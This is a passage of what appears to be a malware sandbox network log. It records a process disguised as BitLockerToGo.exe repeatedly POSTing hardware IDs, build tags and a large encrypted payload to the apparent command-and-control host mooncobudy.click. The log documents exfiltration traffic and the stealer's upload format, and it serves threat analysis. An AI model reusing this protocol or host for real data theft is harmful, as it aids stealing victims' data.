ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1801&rtt_var=685&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19091&delivery_rate=1586094&cwnd=212&unsent_bytes=0&cid=1fd66fa8b095b334&ts=1392&x=0"
2024-12-24 01:56:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:56:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:43 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=FCOPZD72NDC4GN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8761 Host: mooncobudy.click
2024-12-24 01:56:43 UTC	8761	OUT	Data Raw: 2d 2d 46 43 4f 50 5a 44 37 32 4e 44 43 34 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 43 4f 50 5a 44 37 32 4e 44 43 34 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 43 4f 50 5a 44 37 32 4e 44 43 34 47 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 46 43 4f 50 5a 44 37 Data Ascii: --FCOPZD72NDC4GNContent-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--FCOPZD72NDC4GNContent-Disposition: form-data; name="pid"2--FCOPZD72NDC4GNContent-Disposition: form-data; name="lid"Jwquln--2112YT--FCOPZD7
2024-12-24 01:56:44 UTC	1121	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:56:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5ggqnitamj4b74ha5be1r6dna8; expires=Fri, 18 Apr 2025 19:43:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QLncLZ5RPSWl9M0epq2xKLef9w88R16rXgVZ196nscVnK6yBtsLA2tW9AmltzvEdjvgh%2Bvpfc4jwzIxWLSejKKjCxNWnYcEWGz01%2FNOrrCgUpMD8N7JgnVr3TkNO9KrcG1We"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cf9faa93e42aa-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1591&rtt_var=607&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9696&delivery_rate=1785932&cwnd=195&unsent_bytes=0&cid=b2010aa2ed4359e4&ts=948&x=0"
2024-12-24 01:56:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:56:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:45 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=QV6QGZ1BC3OZLY6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20420 Host: mooncobudy.click
2024-12-24 01:56:45 UTC	15331	OUT	Data Raw: 2d 2d 51 56 36 51 47 5a 31 42 43 33 4f 5a 4c 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 56 36 51 47 5a 31 42 43 33 4f 5a 4c 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 56 36 51 47 5a 31 42 43 33 4f 5a 4c 59 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 51 56 36 51 Data Ascii: --QV6QGZ1BC3OZLY6Content-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--QV6QGZ1BC3OZLY6Content-Disposition: form-data; name="pid"3--QV6QGZ1BC3OZLY6Content-Disposition: form-data; name="lid"Jwquln--2112YT--QV6Q
2024-12-24 01:56:45 UTC	5089	OUT	Data Raw: 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ?lrQMn 64F6(X&7~`aO
2024-12-24 01:56:46 UTC	1128	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:56:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t4tmcfuhlpm2alh47qjrrt353u; expires=Fri, 18 Apr 2025 19:43:25 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kaf0eJKZj7IXqgDXUluxwrQZAYuVvN2q3nFqTxiam8GquwYP%2FlpmTA6%2BRTnuyXfC1koJPfnVMM6%2BzyQasPLurWWYu1%2B3omz7qb00gDhAJ6PA9SAdvpwejTnZwZ5mvUd5gZp5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cfa096dfc0cac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1538&rtt_var=850&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21379&delivery_rate=1898569&cwnd=232&unsent_bytes=0&cid=ebb1f11fbee2e408&ts=1073&x=0"
2024-12-24 01:56:46 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:56:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:48 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5QWPGMFUQQGVWB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1238 Host: mooncobudy.click
2024-12-24 01:56:48 UTC	1238	OUT	Data Raw: 2d 2d 35 51 57 50 47 4d 46 55 51 51 47 56 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 51 57 50 47 4d 46 55 51 51 47 56 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 51 57 50 47 4d 46 55 51 51 47 56 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 35 51 57 50 47 4d 46 Data Ascii: --5QWPGMFUQQGVWBContent-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--5QWPGMFUQQGVWBContent-Disposition: form-data; name="pid"1--5QWPGMFUQQGVWBContent-Disposition: form-data; name="lid"Jwquln--2112YT--5QWPGMF
2024-12-24 01:56:49 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 24 Dec 2024 01:56:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=bb3jpu7otkmd9e8gu59jsmhiv7; expires=Fri, 18 Apr 2025 19:43:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nHcqkpkclvb11KtKqHsr5c3oVBHMH4b5ucYi9wMTCvO0%2F%2FaTfnQ5FqM9QxYbBAWEKaWUulhxvL8UHFwFLLHlUvgpg0Rk942%2FBn5CqDG2M9%2FlrQc%2BvRCzzOUc5Rp8ASNPxhpQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f6cfa1cf962439a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1607&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2151&delivery_rate=1775075&cwnd=233&unsent_bytes=0&cid=39b52fa4ebd81ee6&ts=783&x=0"
2024-12-24 01:56:49 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-24 01:56:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	104.21.44.57	443	7680	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-24 01:56:51 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3HOQIICSEP9NRX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551433 Host: mooncobudy.click
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: 2d 2d 33 48 4f 51 49 49 43 53 45 50 39 4e 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 46 38 32 34 46 30 45 37 45 39 45 46 32 32 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 33 48 4f 51 49 49 43 53 45 50 39 4e 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 48 4f 51 49 49 43 53 45 50 39 4e 52 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4a 77 71 75 6c 6e 2d 2d 32 31 31 32 59 54 0d 0a 2d 2d 33 48 4f 51 49 49 43 Data Ascii: --3HOQIICSEP9NRXContent-Disposition: form-data; name="hwid"AFF824F0E7E9EF22AC8923850305D13E--3HOQIICSEP9NRXContent-Disposition: form-data; name="pid"1--3HOQIICSEP9NRXContent-Disposition: form-data; name="lid"Jwquln--2112YT--3HOQIIC
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: 0e 56 8f d7 75 6e 8f e7 f8 21 aa ee 4e ea d2 47 dd c5 9d 5a 01 a6 e2 ec 20 95 c6 53 ea b7 a3 c6 20 12 28 5d 48 60 b5 2d b9 f1 35 14 d6 15 29 7b 18 a3 8f 85 03 16 20 26 fb 91 82 c1 df a6 11 6f e5 ec 20 e2 44 d3 48 7b 7a 07 67 c2 f0 4a 3e fa c2 76 b0 7d 6b 46 b4 59 74 d4 77 2e cb 03 14 4c da 5b f3 f6 f6 82 7d b2 79 5b b0 e2 34 42 43 1b 28 ab 25 5b f2 9c 6e 3f 24 12 62 6a 47 95 3e 95 5a 56 5a 9f 88 cc 34 bf ca 4a ef 76 6d 34 e8 00 4f d0 69 02 46 c6 e4 40 e8 f1 89 27 a3 91 e2 10 d1 09 fe c6 aa 97 f3 08 cf 28 78 e5 da 81 8a 53 06 3f b2 57 aa 55 56 c7 75 9f 12 d2 52 8c b3 a0 69 67 78 66 c8 b0 51 f7 7e 38 61 08 7a 12 3a 95 89 86 81 d7 41 06 85 1b df 91 7f dd e3 b2 8d 0d af b1 a8 f0 35 cc 80 2e 07 bf ac 2e 93 96 e3 66 94 13 43 33 03 69 dd ae d7 09 cf 06 94 65 af Data Ascii: Vun!NGZ S (]H`-5){ &o DH{zgJ>v}kFYtw.L[}y[4BC(%[n?$bjG>ZVZ4Jvm4OiF@'(xS?WUVuRigxfQ~8az:A5..fC3ie
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: b0 de d9 92 fa c6 b0 a1 49 0d 13 fa 6c 68 0d 3e 57 0a a3 5d f1 e0 f0 13 19 1e 49 49 54 34 fa 2b 05 dd 18 8d 6a 6e c8 90 d0 39 a8 d2 d8 a3 25 3a f7 d7 46 f2 d2 71 7e 2d e2 93 c7 cf 65 62 a4 f9 ae 64 f4 10 df 71 1d e1 7b 73 2d a0 54 8a 2c 7b 98 88 07 03 b7 bf 47 c7 1b c1 57 80 db 11 9a 2f b1 1c 49 cf e3 b2 50 34 02 c6 bb e4 ed 03 07 15 4c de e1 16 3d 5a 88 93 8b 41 4b 69 47 6f 78 e3 c3 a1 40 8d 6f c1 e7 53 22 df fb 9c 5a 0a c5 e6 ba e8 11 cb 9c e9 b6 d8 21 91 8d 2a cd 7b d8 e8 5a 7e 62 5e 3d b5 6d ed e5 73 02 a8 eb b2 a9 6d a9 c9 c8 b2 4d 0d ab b3 7a 59 85 49 a2 10 c7 72 50 b4 3d df 42 d4 4f 92 8f ad 7a 19 65 bb 0c 86 46 47 0d 77 88 3e 99 e8 6a 4e fc ca 2f 29 f7 46 3f 89 ab 48 03 31 bd ff 60 63 4d 8f ba 5d df f9 2a 15 bd 5d a3 8b 3f 22 50 b9 c5 e5 46 ab 83 Data Ascii: Ilh>W]IIT4+jn9%:Fq~-ebdq{s-T,{GW/IP4L=ZAKiGox@oS"Z!{Z~b^=msmMzYIrP=BOzeFGw>jN/)F?H1`cM]]?"PF
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: cb bd b9 31 bf d5 60 c4 6a 79 24 91 b6 76 cc ce 12 0b 2c b7 4f 93 f7 c7 c2 d1 fc 40 2d 27 ef 1a 04 f4 ce ad 21 32 e8 f4 ef 17 0e 17 7e c0 e3 7c 57 63 4a f7 dd 52 d7 a8 0d fa a2 82 02 d9 19 55 63 67 5b 5a b0 67 c8 1b 7f 3b b4 d9 de 3b 5c a9 41 3f fa 41 8c 32 83 99 2d 56 2c 3d 75 5c bb fb 40 1c 7a dd f4 f1 6b 66 fc 84 ce 59 d1 b0 2e a8 d2 b3 8f 0f 3e 50 0c f4 51 db d7 24 52 e1 b2 aa 93 10 e3 46 c1 4e 60 30 cf c8 31 69 52 05 2f 76 d8 79 d4 9a 4f 28 2f e8 43 d4 ac 90 42 0b fa 73 94 d8 b1 88 29 cc 5f 63 8f 91 70 8e 0a 63 ba 8c ff fc 34 bc 63 a9 94 f3 98 e5 d1 66 76 9c 23 97 ef 5f 1f 14 b4 2c ae 35 ff 5b 8e a6 7c 49 b5 f6 56 fe f6 49 22 f3 88 24 2c 3c ba 27 9b f8 d7 03 d2 ad 97 80 e0 6d b7 e0 2a 58 75 6b dd 39 f9 4d d7 9e bc 79 8b fc 11 c7 de 08 5a 12 ef f9 6e Data Ascii: 1`jy$v,O@-'!2~\|WcJRUcg[Zg;;\A?A2-V,=u\@zkfY.>PQ$RFN`01iR/vyO(/CBs)_cpc4cfv#_,5[\|IVI"$,<'m*Xuk9MyZn
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: 9a a6 e4 0a 67 38 4a 44 e8 d5 4c e9 74 fa bc 7e 00 9c 93 5c 90 77 b0 47 ea 36 25 e9 28 51 40 ca 45 dd 20 83 93 73 90 92 88 1d 2d c7 ef de 77 1d 67 50 d9 f6 3a 88 bb fe e2 01 4a 3f 97 df f1 71 be 7b 8d ff 7c 95 8d 49 9c a9 d7 16 7b 75 50 82 7e 32 e3 d9 95 69 5f af ad a3 77 1a cf ed 1d 08 48 62 49 ad 7e 1c 7a 5a 97 fb e9 a5 f6 d4 40 8b 6b c8 f8 85 99 54 89 94 4a c9 4b c4 78 ee 45 ee 30 5f f0 17 9d 17 df 29 cd b8 7a 49 ef 40 c1 db ce d4 e4 34 6c 93 b5 76 7e 4c 6c 8b 4e b7 b1 7f 4b ab 6c 20 f3 d7 62 07 8a 10 b4 79 70 f9 db 0f d1 28 b2 4b d1 77 f7 ea 36 af c2 44 b1 95 09 4d b3 bd 55 24 55 ac 8e e7 f5 1b cc 77 1d a7 19 81 b7 04 e0 d6 be c9 f9 c7 c4 a1 70 23 86 d2 7f a6 7a 65 13 47 3d af 05 7a 97 96 d8 98 ff cb bc f6 29 23 4d 0d 65 1e 65 96 c8 57 c1 b1 ff 41 bd Data Ascii: g8JDLt~\wG6%(Q@E s-wgP:J?q{\|I{uP~2i_wHbI~zZ@kTJKxE0_)zI@4lv~LlNKl byp(Kw6DMU$Uwp#zeG=z)#MeeWA
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: bb a0 c8 03 d2 72 54 68 f2 46 9c 32 13 4c 4a 65 ab 63 18 da c1 b3 d0 78 16 56 66 e6 82 90 45 a9 03 52 38 a8 d6 fa c9 89 2b 19 11 9e a0 c9 e1 96 d9 74 ae 93 61 3d 3a 55 f0 68 90 24 df 1b 63 bb fe c8 4d cd b4 98 0b 46 16 8b db f3 3e 97 3c ea 83 7c c7 a4 19 b6 1e b5 7d 22 cd 41 a9 b5 e5 28 72 1a bf b5 d8 98 d8 c0 fe 17 aa b9 1d fb 0a 83 26 f7 2f da 77 13 99 32 c2 7b 18 45 85 6d ad 84 d9 1b 84 a7 65 11 17 56 6b 9b 0a ea cc 83 36 5e 8f 5e 7f e0 bf e3 74 e2 70 c5 97 0a 81 cd 08 ae c9 c4 ce 7f 0d c3 4a f7 22 56 dd 99 9e 1c ba a8 43 29 cb 42 cc 35 96 e6 c3 7c c9 4a d2 26 0c 5b f8 e8 8f 6d d8 27 7b 66 65 a4 41 4d 7b 28 c6 9e 84 76 d1 0b 08 2a 30 05 31 2b a2 e4 76 5d 54 cd b4 d5 35 11 8a aa d1 44 81 10 ea 15 28 0c fd b9 fe a0 ce b0 01 de 94 4e 4f 22 81 7d db 4b f5 Data Ascii: rThF2LJecxVfER8+ta=:Uh$cMF><\|}"A(r&/w2{EmeVk6^^tpJ"VC)B5\|J&[m'{feAM{(v*01+v]T5D(NO"}K
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: 89 f6 ac d1 aa c1 8d d6 19 89 30 66 1c 25 ed d3 94 e6 f8 ee 6f 8c 82 bf 9e 29 b2 8d 7f 30 7f 74 bd 0c f2 d8 24 a4 5e 9a 9f d2 1f d6 f7 04 b9 2e 9c 11 06 e5 b1 c1 62 8f 9f 34 d3 07 2c 24 3e 1c eb 45 fe df 01 69 52 5d ab 5b 27 3b 8b 3e bc ab 4b 51 2b 77 a7 f8 db 87 e1 7f de 15 c0 21 56 a0 75 88 79 bc 64 2a e9 b9 62 ec af 70 57 b1 35 7c 92 c9 b1 94 23 ea 45 23 63 c1 4a c8 5b d7 0f fd 9f f1 6a 5c ef f8 2e 92 bb 56 b3 91 b0 02 ea 12 a0 59 8b 05 76 6c f7 cf 37 a1 be d5 51 77 41 34 be a4 7b 6d 2e 99 a5 89 21 0e ac 14 df 22 a9 03 d0 b9 9a 63 15 41 95 a0 3b b0 1d 1e f7 a9 5d da cc 22 5a b6 4d 04 17 60 77 25 72 6c de a3 ad e3 0c 3e a2 1a cc fc b6 62 81 2d c8 15 21 35 c2 f6 fb b1 7c c7 c8 5a d4 80 2d 9e fe ef e2 b9 3e 20 a8 f0 1e 51 76 a3 e4 3e a9 ce 10 1d 7c 78 9f Data Ascii: 0f%o)0t$^.b4,$>EiR][';>KQ+w!Vuyd*bpW5\|#E#cJ[j\.VYvl7QwA4{m.!"cA;]"ZM`w%rl>b-!5\|Z-> Qv>\|x
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: 90 d8 45 ff fa 0d 7b 55 4e 07 23 f6 fe 9e 75 51 a3 df ac 01 21 3a 72 6a b8 58 83 35 d3 4f f0 9b bf 6c 96 95 a6 1b eb c7 4e ed d5 0f 93 f8 fd eb 4f 7d 77 25 e5 7d 93 1f af 8a d6 e7 3f 39 38 1c fd 5e 52 e2 6e a5 28 df 87 0a 36 c3 7c 3d 4d 3d 45 27 02 c4 67 2e 42 c7 fa 0e b8 8f 0b 9d 51 03 28 72 e4 f4 36 ae 16 a9 1b ba 3b 8e 45 8a 0b 5c ef 6c ab 48 5d 71 69 db 05 0c 36 7e 2c 2c 23 d6 91 2b 48 e6 b2 1b 2f e2 8a fd c5 f7 97 30 e6 51 d8 f5 0b 8a 89 5b 39 0e e7 5b 36 ea 1f bb bc 5b 91 df 4a 50 b3 eb 7d f6 33 07 9f 98 a9 52 57 f4 43 a3 1b cc 63 81 f7 9f aa 78 b4 d5 37 ce 4f 5d 38 50 78 f0 bb d7 b9 4d 8d 95 ad cd 60 52 06 21 2f 79 70 f0 f7 72 68 2c 41 e3 00 a0 45 d6 48 2b 0d fe f3 99 15 3e e8 6e 5c 63 41 69 e3 10 1e 51 1e 5c df dc bd 60 b6 9f 5e ef e3 cb 41 2f ca Data Ascii: E{UN#uQ!:rjX5OlNO}w%}?98^Rn(6\|=M=E'g.BQ(r6;E\lH]qi6~,,#+H/0Q[9[6[JP}3RWCcx7O]8PxM`R!/yprh,AEH+>n\cAiQ\`^A/
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: c0 43 56 68 b7 f2 6b 73 54 31 92 17 39 24 94 6a dd 7d 8e 2c 50 d0 ab 40 a2 37 07 d9 46 ea 17 79 97 72 f4 55 83 8d 10 b5 75 bc 52 8f ae 63 f9 46 f9 83 2d f6 8a f4 1f 3e d2 2f 71 58 28 73 fe 9f f8 de 91 86 d5 54 65 f2 3d 65 9a 06 06 f0 7f e3 ba 2c ef e9 6f 68 d4 68 1e 50 65 5c bd f9 97 f0 ee 55 ae a9 44 c4 0f 39 08 01 a1 61 44 fe 5d 88 21 2b dc 5a c1 fe 3b 98 f2 2c 06 d6 db 8b 8b 28 b6 80 f0 9d 3c ec 17 fc 45 7a 4b c1 5e 12 eb 22 28 51 36 f7 67 78 d7 b0 d0 45 be cd c0 d7 f6 cf ff d6 40 f8 68 70 00 bb 91 b5 85 83 1c ef f2 28 db cc 0c 39 92 59 4f 8f 88 98 7f 35 15 43 d5 89 60 6f 1c e3 da cb 51 a1 7a fa 49 c3 cf a2 a3 4f df 40 35 fa d5 51 4e da 86 4f a2 5e 62 81 0f 39 a9 4d 02 d8 ec cd 42 10 3c 24 79 98 79 41 78 4c bb 36 fb ac b0 60 e2 27 c3 0a 36 b9 cd 85 68 Data Ascii: CVhksT19$j},P@7FyrUuRcF->/qX(sTe=e,ohhPe\UD9aD]!+Z;,(<EzK^"(Q6gxE@hp(9YO5C`oQzIO@5QNO^b9MB<$yyAxL6`'6h
2024-12-24 01:56:51 UTC	15331	OUT	Data Raw: 68 f0 e7 bc c8 a1 de 58 af 43 63 fc 38 57 e7 3a 5f fe b7 d9 89 f7 aa ff e2 08 a5 51 a2 02 2b 0b 8b 2c 94 eb 65 64 c7 64 6a 76 64 66 02 62 e5 96 af 44 e6 cd 1f 9c aa c0 7b 34 8b 8b 77 d1 c1 49 39 20 69 b7 62 3c 13 01 96 04 ba 16 5b 5c c9 fb a0 37 10 fb cf 33 b8 e2 f7 71 82 de c6 be f1 7b 5b 84 54 fd 21 ce 48 ff f8 ef d1 7e 49 03 14 f3 07 55 6d 0c 4a 97 50 a2 df f5 c7 96 b3 aa a8 7f d8 4e 89 5f fb 13 7f af e5 6e 4d db 2b 06 50 18 a5 7b fb 5f 79 85 f6 b3 56 84 15 7d 08 c1 5f 9d 21 14 bb 3a 06 26 23 d8 eb c2 0a 64 ca c6 56 40 d5 3c 9b 43 99 0c f3 5e e1 1b f7 dc a4 a6 56 7d 36 a5 f5 fd 1e 76 ca c4 c0 01 9f 06 ea 69 84 35 3a d7 98 ae d0 1f fc d3 fd 7b c4 81 3a 6e af 80 a8 f9 39 10 d0 0d 2d 4b 80 02 47 ea ef ea a9 ac 27 7a 3d 20 b3 f2 f3 e5 2d bf 8f e8 5c f1 f0 Data Ascii: hXCc8W:_Q+,eddjvdfbD{4wI9 ib<[\73q{[T!H~IUmJPN_nM+P{_yV}_!:&#dV@<C^V}6vi5:{:n9-KG'z= -\
